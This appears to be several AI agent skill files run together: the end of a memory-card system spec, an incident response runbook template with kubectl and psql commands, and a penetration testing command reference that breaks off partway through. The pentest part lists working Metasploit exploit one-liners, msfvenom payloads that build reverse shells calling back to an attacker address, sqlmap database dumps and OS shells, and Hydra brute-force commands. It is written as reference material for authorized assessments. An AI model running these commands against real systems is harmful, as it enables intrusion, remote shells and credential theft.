topic: Stuff I Learned Today
---
Today I learned a bunch of things about Cortex and TheHive. The CSRF thing was really tricky
and took a while to figure out. I also learned about how to set up organizations and users.
It was a productive session overall.
```
(Too vague, no specifics, no actionable info, multiple topics in one card)
## Capture Triggers
### Automatic (agent should capture without being asked)
- Hard-won debugging lessons (3+ attempts to fix something)
- Configuration gotchas (things that work differently than expected)
- User corrections ("no, do it THIS way")
- Non-obvious facts about infrastructure, people, or projects
- Workflow improvements discovered during a task
### Manual
- User says `/learn`, "remember this", or "save this"
- User explicitly corrects the agent's approach
### What NOT to Capture
- Obvious/trivial information
- Temporary context (one-time fixes that won't recur)
- Things already in existing cards
- Conversation summaries (that's what daily logs are for)
## Daily Log Format
Append to `memory/YYYY-MM-DD.md`:
```markdown
## HH:MM — Brief Title
What happened, what was decided, what was learned.
Link to any cards created: `→ card: topic-name`
```
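A minimal sketch of appending an entry in this format is shown below. The function name and parameters are hypothetical; the heading, body, and card-link lines follow the template above.

```python
from datetime import datetime
from pathlib import Path


def append_log_entry(memory_dir, title, notes, cards=(), now=None):
    """Append one entry to memory/YYYY-MM-DD.md and return the log path."""
    now = now or datetime.now()
    log_path = Path(memory_dir) / f"{now:%Y-%m-%d}.md"
    # \u2014 is the dash used in the "## HH:MM ... Brief Title" heading format.
    lines = [f"## {now:%H:%M} \u2014 {title}", notes]
    lines += [f"`→ card: {name}`" for name in cards]
    log_path.parent.mkdir(parents=True, exist_ok=True)
    with log_path.open("a", encoding="utf-8") as handle:
        handle.write("\n".join(lines) + "\n")
    return log_path
```

Opening the file in append mode keeps the log append-only, which matches its role as a raw scratch pad rather than curated memory.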
## Memory Maintenance
Periodically (every few days), the agent should:
1. Read recent daily logs
2. Identify significant events worth preserving long-term
3. Create or update knowledge cards from insights
4. Remove outdated info from MEMORY.md
5. Update the card categories table in MEMORY.md
Think of it like a human reviewing their journal and updating their mental model.
## Promotion Rules
When the same lesson appears 3+ times in cards:
- Promote it to AGENTS.md as a permanent rule
- Mark the original card as "promoted"
- This prevents the agent from re-learning the same lesson
## Session Workflow
```
Session Start
│
├── Read MEMORY.md (always, ~2KB)
├── memory_search for task-relevant cards
├── Skim today + yesterday daily logs
│
├── [Do work]
│
├── Capture insights → knowledge cards
├── Log session → daily log
│
Session End
```
## Scaling
This system has been tested with:
- ~36 knowledge cards (~350 tokens each = ~12.6K tokens total)
- Daily logs spanning months
- Semantic search via embeddings (qwen3-embedding or similar)
At this scale, semantic search finds relevant cards in <100ms. The master index stays under 2KB. The agent loads only what it needs.
If you hit 100+ cards, consider:
- Archiving cards older than 6 months that haven't been accessed
- Splitting categories into subdirectories
- Adding a card index file per category
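The archiving suggestion could be automated along these lines. The source does not say how card access is tracked, so this sketch uses the `updated` frontmatter date as a stand-in for "not accessed"; that proxy, the 183-day threshold, and the function names are all assumptions.

```python
import re
import shutil
from datetime import date, timedelta
from pathlib import Path


def card_updated(path):
    """Read the `updated: YYYY-MM-DD` frontmatter date, or None if absent."""
    text = Path(path).read_text(encoding="utf-8")
    match = re.search(r"^updated:\s*(\d{4})-(\d{2})-(\d{2})\s*$", text, re.MULTILINE)
    return date(*map(int, match.groups())) if match else None


def archive_stale_cards(cards_dir, archive_dir, today=None, max_age_days=183):
    """Move cards last updated before the cutoff; return the moved file names."""
    today = today or date.today()
    cutoff = today - timedelta(days=max_age_days)
    archive = Path(archive_dir)
    moved = []
    for card in sorted(Path(cards_dir).glob("*.md")):
        updated = card_updated(card)
        if updated is not None and updated < cutoff:
            archive.mkdir(parents=True, exist_ok=True)
            shutil.move(str(card), str(archive / card.name))
            moved.append(card.name)
    return moved
```

Cards without an `updated` field are left in place, so a malformed card is never archived by accident.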
## Comparison with Monolithic Memory
| | Monolithic (one big file) | Knowledge Cards |
|---|---|---|
| Load time | Grows forever | Constant (~2KB index) |
| Search | Full-text scan | Semantic vector search |
| Updates | Append-only chaos | Atomic card updates |
| Noise ratio | High (old + new mixed) | Low (curated cards) |
| Session cost | Tokens scale with history | Tokens stay flat |
FILE:README.md
# self-learning-agent
Knowledge card memory system with semantic search. Agents wake up fresh each session but remember everything through atomic ~350-token cards, daily logs, and a slim master index.
## The Problem
AI agents lose context between sessions. The common fix (one big MEMORY.md) works until it doesn't. After a few weeks, the file is 60KB of mixed-relevance notes that burns tokens on every load and buries important facts in noise.
## The Solution
Three-tier memory architecture:
1. **MEMORY.md** (~2KB) — Slim master index, loaded every session. Orientation only.
2. **Knowledge cards** (~350 tokens each) — Atomic facts with YAML frontmatter. One topic per file. Searched semantically, not loaded in bulk.
3. **Daily logs** — Raw session notes. Periodically distilled into cards.
## How It Works
- Agent loads the 2KB index on startup (constant cost regardless of history length)
- Semantic search finds relevant cards for the current task
- Agent captures lessons, corrections, and facts as new cards
- Periodically distills daily logs into curated cards
- Lessons that repeat 3+ times get promoted to permanent rules
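The semantic search step can be sketched as cosine similarity over precomputed embeddings. The vectors below are toy three-dimensional values made up for illustration. A real setup would get them from an embedding model, and that call is out of scope here.

```python
import math


def cosine(a, b):
    """Cosine similarity between two equal-length vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    norm = math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b))
    return dot / norm if norm else 0.0


def search_cards(query_vec, card_vecs, top_k=3):
    """Rank card names by similarity to the query embedding, best first."""
    ranked = sorted(
        card_vecs,
        key=lambda name: cosine(query_vec, card_vecs[name]),
        reverse=True,
    )
    return ranked[:top_k]


# Toy embeddings (assumed values); card names are hypothetical file stems.
card_vecs = {
    "nas-storage": [0.9, 0.1, 0.0],
    "thehive-password": [0.1, 0.9, 0.1],
    "code-search-api": [0.0, 0.2, 0.9],
}
print(search_cards([0.8, 0.2, 0.1], card_vecs, top_k=2))
```

A linear scan like this is enough for a few dozen cards. A vector index only becomes worth considering at much larger card counts.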
## Production Tested
Running in production with ~36 cards spanning infrastructure, security, career, tools, and workflow topics. Semantic search via embeddings finds the right card in <100ms. Session token cost stays flat regardless of how many months of history exist.
## Tags
memory, learning, self-improving, knowledge-management, agent-memory, persistence
FILE:references/card-examples.md
# Knowledge Card Examples
## Infrastructure Card
```markdown
---
topic: Buffalo NAS Storage
category: infrastructure
tags: [nas, smb, storage, buffalo, backup]
created: 2026-01-15
updated: 2026-02-20
---
NAS Server at YOUR_NAS_IP. Mount: /mnt/nas (SMB/CIFS, guest).
~2.7TB total, ~2.1TB free. Auto-mounts via fstab + systemd automount.
Key dirs:
- Pictures/Al Pics/ — 287GB family photos (2018-2021), IRREPLACEABLE
- Phone_Backups/ — by device/date
- backups/ — migration backup (4GB)
- ai-gen/ — datasets, models, workflows
Manual mount: sudo mount /mnt/nas
Other shares: smbclient //YOUR_NAS_IP/<share> -N
```
## Lesson Card
```markdown
---
topic: TheHive Password Change Gotcha
category: lessons
tags: [thehive, api, password, gotcha]
created: 2026-03-19
updated: 2026-03-19
---
PATCH /api/v1/user/<login> returns 204 but SILENTLY IGNORES the password field.
Must use POST /api/v1/user/<login>/password/change with body:
{"currentPassword":"old","password":"new"}
Also: passwords with ! break curl due to bash history expansion.
Fix: printf '{"password":"Foo!"}' | curl -d @-
```
## Tools Card
```markdown
---
topic: Code Search API
category: tools
tags: [code-search, api, embeddings, search]
created: 2026-02-15
updated: 2026-03-10
---
Local code search at http://localhost:5204/api/search
Modes: hybrid (default, best), code (raw), summary (NL)
Stack: qwen3-embedding:8b embeddings + qwen3-coder-next:cloud summaries
curl -s -X POST http://localhost:5204/api/search \
-H "Content-Type: application/json" \
-d '{"query":"search term","mode":"hybrid","limit":10}'
Health: curl localhost:5204/api/health
Re-index: curl -X POST "localhost:5204/api/index?summarize=true"
Nightly re-index at 4am via cron.
```
## Human Context Card
```markdown
---
topic: Human Context
category: human
tags: [owner, user, preferences]
created: 2026-01-31
updated: 2026-03-15
---
Your Name (YOUR_EMAIL)
Targeting Network Admin at Southeastern University (SEU).
M.S. Cybersecurity at USF, 12 credits remaining (Fall 2026 graduation).
Preferences:
- No em dashes. Ever. Use periods, commas, colons, parentheses.
- Chicago Notes-Bibliography citation standard.
- Pragmatic > theoretical. Show me the command, not the theory.
- Hates sycophantic AI responses. Be direct.
```
## Category Reference
| Category | Use For |
|----------|---------|
| system | Agent config, identity, search, crons |
| human | Owner info, preferences, communication style |
| infrastructure | Hardware, ports, services, networking |
| models | AI model subscriptions, assignments, benchmarks |
| workflow | Pipelines, content, sprints, dev tools |
| career | Jobs, resume, education, negotiations |
| tools | APIs, CLIs, integrations, reference docs |
| business | LLC, service business, branding |
| projects | Project status, architecture, decisions |
| security | Audits, hardening, OSINT |
| school | Course notes, assignments, writing standards |
| research | Latest findings, intel |
| lessons | Hard-won gotchas, corrections, mistakes |
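A card in the format shown above can be split into frontmatter and body with a few lines of standard-library code. This is a minimal sketch, not a YAML parser: it handles only flat `key: value` pairs and inline `[a, b]` lists, which is all the examples here use. The function name `parse_card` is illustrative.

```python
CATEGORIES = {
    "system", "human", "infrastructure", "models", "workflow", "career",
    "tools", "business", "projects", "security", "school", "research",
    "lessons",
}


def parse_card(text):
    """Return (frontmatter dict, body string) for one knowledge card."""
    lines = [line.rstrip() for line in text.strip().splitlines()]
    if not lines or lines[0] != "---":
        raise ValueError("card must start with a '---' line")
    try:
        end = lines.index("---", 1)  # closing frontmatter delimiter
    except ValueError:
        raise ValueError("frontmatter is not closed with '---'") from None
    meta = {}
    for line in lines[1:end]:
        key, _, value = line.partition(":")
        value = value.strip()
        if value.startswith("[") and value.endswith("]"):
            value = [v.strip() for v in value[1:-1].split(",") if v.strip()]
        meta[key.strip()] = value
    if meta.get("category") not in CATEGORIES:
        raise ValueError(f"unknown category: {meta.get('category')!r}")
    return meta, "\n".join(lines[end + 1:]).strip()


card = """---
topic: TheHive Password Change Gotcha
category: lessons
tags: [thehive, api, password, gotcha]
created: 2026-03-19
updated: 2026-03-19
---
PATCH /api/v1/user/<login> returns 204 but SILENTLY IGNORES the password field.
"""
meta, body = parse_card(card)
print(meta["topic"], meta["tags"])
```

Rejecting unknown categories at parse time keeps the category table and the cards from drifting apart.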
Production-ready incident response runbook templates. Step-by-step procedures for detection, triage, mitigation, resolution, and communication. Includes esca...
---
name: incident-runbook-templates
version: 1.0.0
description: "Production-ready incident response runbook templates. Step-by-step procedures for detection, triage, mitigation, resolution, and communication. Includes escalation paths, on-call onboarding, and post-incident review formats."
---
# Incident Runbook Templates
Production-ready templates for incident response runbooks covering detection, triage, mitigation, resolution, and communication.
## Do not use this skill when
- The task is unrelated to incident runbook templates
- You need a different domain or tool outside this scope
## Instructions
- Clarify goals, constraints, and required inputs.
- Apply relevant best practices and validate outcomes.
- Provide actionable steps and verification.
- If detailed examples are required, open `resources/implementation-playbook.md`.
## Use this skill when
- Creating incident response procedures
- Building service-specific runbooks
- Establishing escalation paths
- Documenting recovery procedures
- Responding to active incidents
- Onboarding on-call engineers
## Core Concepts
### 1. Incident Severity Levels
| Severity | Impact | Response Time | Example |
|----------|--------|---------------|---------|
| **SEV1** | Complete outage, data loss | 15 min | Production down |
| **SEV2** | Major degradation | 30 min | Critical feature broken |
| **SEV3** | Minor impact | 2 hours | Non-critical bug |
| **SEV4** | Minimal impact | Next business day | Cosmetic issue |
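The response times in the table translate directly into a deadline calculation. In this sketch, SEV4's "next business day" is read as the same clock time on the next weekday. That reading is an assumption, and it ignores holidays and time zones.

```python
from datetime import datetime, timedelta

# Response targets taken from the severity table.
RESPONSE_TARGETS = {
    "SEV1": timedelta(minutes=15),
    "SEV2": timedelta(minutes=30),
    "SEV3": timedelta(hours=2),
}


def response_deadline(severity, detected_at):
    """Return the latest acceptable time for a first response."""
    if severity in RESPONSE_TARGETS:
        return detected_at + RESPONSE_TARGETS[severity]
    if severity == "SEV4":
        deadline = detected_at + timedelta(days=1)
        while deadline.weekday() >= 5:  # 5 = Saturday, 6 = Sunday
            deadline += timedelta(days=1)
        return deadline
    raise ValueError(f"unknown severity: {severity}")


detected = datetime(2026, 3, 6, 16, 0)  # a Friday afternoon
print(response_deadline("SEV1", detected))
print(response_deadline("SEV4", detected))
```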
### 2. Runbook Structure
```
1. Overview & Impact
2. Detection & Alerts
3. Initial Triage
4. Mitigation Steps
5. Root Cause Investigation
6. Resolution Procedures
7. Verification & Rollback
8. Communication Templates
9. Escalation Matrix
```
## Runbook Templates
### Template 1: Service Outage Runbook
```markdown
# [Service Name] Outage Runbook
## Overview
**Service**: Payment Processing Service
**Owner**: Platform Team
**Slack**: #payments-incidents
**PagerDuty**: payments-oncall
## Impact Assessment
- [ ] Which customers are affected?
- [ ] What percentage of traffic is impacted?
- [ ] Are there financial implications?
- [ ] What's the blast radius?
## Detection
### Alerts
- `payment_error_rate > 5%` (PagerDuty)
- `payment_latency_p99 > 2s` (Slack)
- `payment_success_rate < 95%` (PagerDuty)
### Dashboards
- [Payment Service Dashboard](https://grafana/d/payments)
- [Error Tracking](https://sentry.io/payments)
- [Dependency Status](https://status.stripe.com)
## Initial Triage (First 5 Minutes)
### 1. Assess Scope
```bash
# Check service health
kubectl get pods -n payments -l app=payment-service
# Check recent deployments
kubectl rollout history deployment/payment-service -n payments
# Check error rates (-G with --data-urlencode stops curl from globbing {} and [] in the query)
curl -sG "http://prometheus:9090/api/v1/query" --data-urlencode "query=sum(rate(http_requests_total{status=~'5..'}[5m]))"
```
### 2. Quick Health Checks
- [ ] Can you reach the service? `curl -I https://api.company.com/payments/health`
- [ ] Database connectivity? Check connection pool metrics
- [ ] External dependencies? Check Stripe, bank API status
- [ ] Recent changes? Check deploy history
### 3. Initial Classification
| Symptom | Likely Cause | Go To Section |
|---------|--------------|---------------|
| All requests failing | Service down | Section 4.1 |
| High latency | Database/dependency | Section 4.2 |
| Partial failures | Code bug | Section 4.3 |
| Spike in errors | Traffic surge | Section 4.4 |
## Mitigation Procedures
### 4.1 Service Completely Down
```bash
# Step 1: Check pod status
kubectl get pods -n payments
# Step 2: If pods are crash-looping, check logs
kubectl logs -n payments -l app=payment-service --tail=100
# Step 3: Check recent deployments
kubectl rollout history deployment/payment-service -n payments
# Step 4: ROLLBACK if recent deploy is suspect
kubectl rollout undo deployment/payment-service -n payments
# Step 5: Scale up if resource constrained
kubectl scale deployment/payment-service -n payments --replicas=10
# Step 6: Verify recovery
kubectl rollout status deployment/payment-service -n payments
```
### 4.2 High Latency
```bash
# Step 1: Check database connections
kubectl exec -n payments deploy/payment-service -- \
curl localhost:8080/metrics | grep db_pool
# Step 2: Check slow queries (if DB issue)
psql -h $DB_HOST -U $DB_USER -c "
SELECT pid, now() - query_start AS duration, query
FROM pg_stat_activity
WHERE state = 'active' AND now() - query_start > interval '5 seconds'
ORDER BY duration DESC;"
# Step 3: Kill long-running queries if needed (replace <pid> with a pid from Step 2)
psql -h $DB_HOST -U $DB_USER -c "SELECT pg_terminate_backend(<pid>);"
# Step 4: Check external dependency latency
curl -w "@curl-format.txt" -o /dev/null -s https://api.stripe.com/v1/health
# Step 5: Enable circuit breaker if dependency is slow
kubectl set env deployment/payment-service \
STRIPE_CIRCUIT_BREAKER_ENABLED=true -n payments
```
### 4.3 Partial Failures (Specific Errors)
```bash
# Step 1: Identify error pattern
kubectl logs -n payments -l app=payment-service --tail=500 | \
grep -i error | sort | uniq -c | sort -rn | head -20
# Step 2: Check error tracking
# Go to Sentry: https://sentry.io/payments
# Step 3: If specific endpoint, enable feature flag to disable
curl -X POST https://api.company.com/internal/feature-flags \
-H "Content-Type: application/json" \
-d '{"flag": "DISABLE_PROBLEMATIC_FEATURE", "enabled": true}'
# Step 4: If data issue, check recent data changes
psql -h $DB_HOST -c "
SELECT * FROM audit_log
WHERE table_name = 'payment_methods'
AND created_at > now() - interval '1 hour';"
```
### 4.4 Traffic Surge
```bash
# Step 1: Check current pod CPU/memory usage (kubectl top does not report request rate)
kubectl top pods -n payments
# Step 2: Scale horizontally
kubectl scale deployment/payment-service -n payments --replicas=20
# Step 3: Enable rate limiting
kubectl set env deployment/payment-service \
RATE_LIMIT_ENABLED=true \
RATE_LIMIT_RPS=1000 -n payments
# Step 4: If attack, block suspicious IPs
kubectl apply -f - <<EOF
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-suspicious
  namespace: payments
spec:
  podSelector:
    matchLabels:
      app: payment-service
  ingress:
  - from:
    - ipBlock:
        cidr: 0.0.0.0/0
        except:
        - 192.168.1.0/24  # Suspicious range
EOF
```
## Verification Steps
```bash
# Verify service is healthy
curl -s https://api.company.com/payments/health | jq
# Verify error rate is back to normal (-G with --data-urlencode avoids curl globbing of {} and [])
curl -sG "http://prometheus:9090/api/v1/query" --data-urlencode "query=sum(rate(http_requests_total{status=~'5..'}[5m]))" | jq '.data.result[0].value[1]'
# Verify latency is acceptable
curl -sG "http://prometheus:9090/api/v1/query" --data-urlencode "query=histogram_quantile(0.99,sum(rate(http_request_duration_seconds_bucket[5m]))by(le))" | jq
# Smoke test critical flows
./scripts/smoke-test-payments.sh
```
## Rollback Procedures
```bash
# Rollback Kubernetes deployment
kubectl rollout undo deployment/payment-service -n payments
# Rollback database migration (if applicable)
./scripts/db-rollback.sh $MIGRATION_VERSION
# Rollback feature flag
curl -X POST https://api.company.com/internal/feature-flags \
-H "Content-Type: application/json" \
-d '{"flag": "NEW_PAYMENT_FLOW", "enabled": false}'
```
## Escalation Matrix
| Condition | Escalate To | Contact |
|-----------|-------------|---------|
| > 15 min unresolved SEV1 | Engineering Manager | @manager (Slack) |
| Data breach suspected | Security Team | #security-incidents |
| Financial impact > $10k | Finance + Legal | @finance-oncall |
| Customer communication needed | Support Lead | @support-lead |
## Communication Templates
### Initial Notification (Internal)
```
🚨 INCIDENT: Payment Service Degradation
Severity: SEV2
Status: Investigating
Impact: ~20% of payment requests failing
Start Time: [TIME]
Incident Commander: [NAME]
Current Actions:
- Investigating root cause
- Scaling up service
- Monitoring dashboards
Updates in #payments-incidents
```
### Status Update
```
📊 UPDATE: Payment Service Incident
Status: Mitigating
Impact: Reduced to ~5% failure rate
Duration: 25 minutes
Actions Taken:
- Rolled back deployment v2.3.4 → v2.3.3
- Scaled service from 5 → 10 replicas
Next Steps:
- Continuing to monitor
- Root cause analysis in progress
ETA to Resolution: ~15 minutes
```
### Resolution Notification
```
✅ RESOLVED: Payment Service Incident
Duration: 45 minutes
Impact: ~5,000 affected transactions
Root Cause: Memory leak in v2.3.4
Resolution:
- Rolled back to v2.3.3
- Transactions auto-retried successfully
Follow-up:
- Postmortem scheduled for [DATE]
- Bug fix in progress
```
```
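The escalation matrix in Template 1 can be expressed as a small decision function, which makes it easy to check during a game day. This is a sketch under assumptions: the `IncidentState` fields are hypothetical names, and the thresholds are the ones from the matrix.

```python
from dataclasses import dataclass


@dataclass
class IncidentState:
    severity: str
    minutes_unresolved: int
    data_breach_suspected: bool = False
    financial_impact_usd: float = 0.0
    customer_comms_needed: bool = False


def escalation_targets(state):
    """Return the teams to escalate to, in matrix order."""
    targets = []
    if state.severity == "SEV1" and state.minutes_unresolved > 15:
        targets.append("Engineering Manager")
    if state.data_breach_suspected:
        targets.append("Security Team")
    if state.financial_impact_usd > 10_000:
        targets.append("Finance + Legal")
    if state.customer_comms_needed:
        targets.append("Support Lead")
    return targets


state = IncidentState("SEV1", minutes_unresolved=20, financial_impact_usd=25_000)
print(escalation_targets(state))
```

The conditions are independent, so one incident can trigger several escalations at once.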
### Template 2: Database Incident Runbook
```markdown
# Database Incident Runbook
## Quick Reference
| Issue | Command |
|-------|---------|
| Check connections | `SELECT count(*) FROM pg_stat_activity;` |
| Kill query | `SELECT pg_terminate_backend(pid);` |
| Check replication lag | `SELECT extract(epoch from (now() - pg_last_xact_replay_timestamp()));` |
| Check locks | `SELECT * FROM pg_locks WHERE NOT granted;` |
## Connection Pool Exhaustion
```sql
-- Check current connections
SELECT datname, usename, state, count(*)
FROM pg_stat_activity
GROUP BY datname, usename, state
ORDER BY count(*) DESC;
-- Identify long-running connections
SELECT pid, usename, datname, state, query_start, query
FROM pg_stat_activity
WHERE state != 'idle'
ORDER BY query_start;
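-- Terminate connections idle for more than 10 minutes
-- (state_change is when the session went idle; query_start is when its last query began)
SELECT pg_terminate_backend(pid)
FROM pg_stat_activity
WHERE state = 'idle'
AND state_change < now() - interval '10 minutes'
AND pid <> pg_backend_pid();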
```
## Replication Lag
```sql
-- Check lag on replica
SELECT
CASE
WHEN pg_last_wal_receive_lsn() = pg_last_wal_replay_lsn() THEN 0
ELSE extract(epoch from now() - pg_last_xact_replay_timestamp())
END AS lag_seconds;
-- If lag > 60s, consider:
-- 1. Check network between primary/replica
-- 2. Check replica disk I/O
-- 3. Consider failover if unrecoverable
```
## Disk Space Critical
```bash
# Check disk usage
df -h /var/lib/postgresql/data
# Find large tables
psql -c "SELECT relname, pg_size_pretty(pg_total_relation_size(relid))
FROM pg_catalog.pg_statio_user_tables
ORDER BY pg_total_relation_size(relid) DESC
LIMIT 10;"
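# VACUUM FULL reclaims space but rewrites the table: it takes an ACCESS EXCLUSIVE lock
# and needs free disk for a full copy, so it can fail when the disk is already full
psql -c "VACUUM FULL large_table;"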
# If emergency, delete old data or expand disk
```
```
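The disk check in the database runbook can also run as a scripted pre-alert. A minimal sketch using only the standard library follows. The 80% and 90% thresholds are assumed values, and the percentage may differ slightly from `df` because of reserved blocks.

```python
import shutil


def disk_usage_percent(path):
    """Return used space on the filesystem containing `path`, as a percentage."""
    usage = shutil.disk_usage(path)
    return 100.0 * usage.used / usage.total


def disk_status(percent_used, warn=80.0, critical=90.0):
    """Classify usage against thresholds (both defaults are assumptions)."""
    if percent_used >= critical:
        return "critical"
    if percent_used >= warn:
        return "warning"
    return "ok"


# "." stands in for the data directory, e.g. /var/lib/postgresql/data.
percent = disk_usage_percent(".")
print(f"{percent:.1f}% used: {disk_status(percent)}")
```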
## Best Practices
### Do's
- **Keep runbooks updated** - Review after every incident
- **Test runbooks regularly** - Game days, chaos engineering
- **Include rollback steps** - Always have an escape hatch
- **Document assumptions** - What must be true for steps to work
- **Link to dashboards** - Quick access during stress
### Don'ts
- **Don't assume knowledge** - Write for 3 AM brain
- **Don't skip verification** - Confirm each step worked
- **Don't forget communication** - Keep stakeholders informed
- **Don't work alone** - Escalate early
- **Don't skip postmortems** - Learn from every incident
## Resources
- [Google SRE Book - Incident Management](https://sre.google/sre-book/managing-incidents/)
- [PagerDuty Incident Response](https://response.pagerduty.com/)
- [Atlassian Incident Management](https://www.atlassian.com/incident-management)
Essential penetration testing command reference. Quick lookup for nmap, Metasploit, hydra, john, nikto, gobuster, and other offensive security tools. Covers...
---
name: Pentest Commands
version: 1.0.0
description: "Essential penetration testing command reference. Quick lookup for nmap, Metasploit, hydra, john, nikto, gobuster, and other offensive security tools. Covers reconnaissance, exploitation, post-exploitation, and lateral movement."
metadata:
  author: zebbern
  version: "1.1"
---
# Pentest Commands
## Purpose
Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments.
## Inputs/Prerequisites
- Kali Linux or penetration testing distribution
- Target IP addresses with authorization
- Wordlists for brute forcing
- Network access to target systems
- Basic understanding of tool syntax
## Outputs/Deliverables
- Network enumeration results
- Identified vulnerabilities
- Exploitation payloads
- Cracked credentials
- Web vulnerability findings
## Core Workflow
### 1. Nmap Commands
**Host Discovery:**
```bash
# Ping sweep (-sP is the legacy alias of -sn)
nmap -sP 192.168.1.0/24
# List IPs without scanning
nmap -sL 192.168.1.0/24
# Ping scan (host discovery)
nmap -sn 192.168.1.0/24
```
**Port Scanning:**
```bash
# TCP SYN scan (stealth)
nmap -sS 192.168.1.1
# Full TCP connect scan
nmap -sT 192.168.1.1
# UDP scan
nmap -sU 192.168.1.1
# All ports (1-65535)
nmap -p- 192.168.1.1
# Specific ports
nmap -p 22,80,443 192.168.1.1
```
**Service Detection:**
```bash
# Service versions
nmap -sV 192.168.1.1
# OS detection
nmap -O 192.168.1.1
# Comprehensive scan
nmap -A 192.168.1.1
# Skip host discovery
nmap -Pn 192.168.1.1
```
**NSE Scripts:**
```bash
# Vulnerability scan
nmap --script vuln 192.168.1.1
# SMB enumeration
nmap --script smb-enum-shares -p 445 192.168.1.1
# HTTP enumeration
nmap --script http-enum -p 80 192.168.1.1
# Check EternalBlue
nmap --script smb-vuln-ms17-010 192.168.1.1
# Check MS08-067
nmap --script smb-vuln-ms08-067 192.168.1.1
# SSH brute force
nmap --script ssh-brute -p 22 192.168.1.1
# FTP anonymous
nmap --script ftp-anon 192.168.1.1
# DNS brute force
nmap --script dns-brute 192.168.1.1
# HTTP methods
nmap -p80 --script http-methods 192.168.1.1
# HTTP headers
nmap -p80 --script http-headers 192.168.1.1
# SQL injection check
nmap --script http-sql-injection -p 80 192.168.1.1
```
**Advanced Scans:**
```bash
# Xmas scan
nmap -sX 192.168.1.1
# ACK scan (firewall detection)
nmap -sA 192.168.1.1
# Window scan
nmap -sW 192.168.1.1
# Traceroute
nmap --traceroute 192.168.1.1
```
### 2. Metasploit Commands
**Basic Usage:**
```bash
# Launch Metasploit
msfconsole
# Search for exploits
search type:exploit name:smb
# Use exploit
use exploit/windows/smb/ms17_010_eternalblue
# Show options
show options
# Set target
set RHOST 192.168.1.1
# Set payload
set PAYLOAD windows/meterpreter/reverse_tcp
# Run exploit
exploit
```
**Common Exploits:**
```bash
# EternalBlue
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit"
# MS08-067 (Conficker)
msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.1; exploit"
# vsftpd backdoor
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 192.168.1.1; exploit"
# Shellshock
msfconsole -x "use exploit/multi/http/apache_mod_cgi_bash_env_exec; set RHOST 192.168.1.1; exploit"
# Drupalgeddon2
msfconsole -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOST 192.168.1.1; exploit"
# PSExec
msfconsole -x "use exploit/windows/smb/psexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit"
```
**Scanners:**
```bash
# TCP port scan
msfconsole -x "use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run"
# SMB version scan
msfconsole -x "use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run"
# SMB share enumeration
msfconsole -x "use auxiliary/scanner/smb/smb_enumshares; set RHOSTS 192.168.1.0/24; run"
# SSH brute force
msfconsole -x "use auxiliary/scanner/ssh/ssh_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"
# FTP brute force
msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"
# RDP scanning
msfconsole -x "use auxiliary/scanner/rdp/rdp_scanner; set RHOSTS 192.168.1.0/24; run"
```
**Handler Setup:**
```bash
# Multi-handler for reverse shells
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.2; set LPORT 4444; exploit"
```
**Payload Generation (msfvenom):**
```bash
# Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe
# Linux reverse shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf
# PHP reverse shell
msfvenom -p php/reverse_php LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php
# ASP reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f asp > shell.asp
# WAR file
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f war > shell.war
# Python payload
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.2 LPORT=4444 -f raw > shell.py
```
### 3. Nikto Commands
```bash
# Basic scan
nikto -h http://192.168.1.1
# Comprehensive scan
nikto -h http://192.168.1.1 -C all
# Output to file
nikto -h http://192.168.1.1 -output report.html
# Plugin-based scans
nikto -h http://192.168.1.1 -Plugins robots
nikto -h http://192.168.1.1 -Plugins shellshock
nikto -h http://192.168.1.1 -Plugins heartbleed
nikto -h http://192.168.1.1 -Plugins ssl
# Export to Metasploit
nikto -h http://192.168.1.1 -Format msf+
# Specific tuning
nikto -h http://192.168.1.1 -Tuning 1  # Interesting files only
```
### 4. SQLMap Commands
```bash
# Basic injection test
sqlmap -u "http://192.168.1.1/page?id=1"
# Enumerate databases
sqlmap -u "http://192.168.1.1/page?id=1" --dbs
# Enumerate tables
sqlmap -u "http://192.168.1.1/page?id=1" -D database --tables
# Dump table
sqlmap -u "http://192.168.1.1/page?id=1" -D database -T users --dump
# OS shell
sqlmap -u "http://192.168.1.1/page?id=1" --os-shell
# POST request
sqlmap -u "http://192.168.1.1/login" --data="user=admin&pass=test"
# Cookie injection
sqlmap -u "http://192.168.1.1/page" --cookie="id=1*"
# Bypass WAF
sqlmap -u "http://192.168.1.1/page?id=1" --tamper=space2comment
# Risk and level
sqlmap -u "http://192.168.1.1/page?id=1" --risk=3 --level=5
```
### 5. Hydra Commands
```bash
# SSH brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
# FTP brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.1
# HTTP POST form
hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
# HTTP Basic Auth
hydra -l admin -P passwords.txt 192.168.1.1 http-get /admin/
# SMB brute force
hydra -l admin -P passwords.txt smb://192.168.1.1
# RDP brute force
hydra -l admin -P passwords.txt rdp://192.168.1.1
# MySQL brute force
hydra -l root -P passwords.txt mysql://192.168.1.1
# Username list
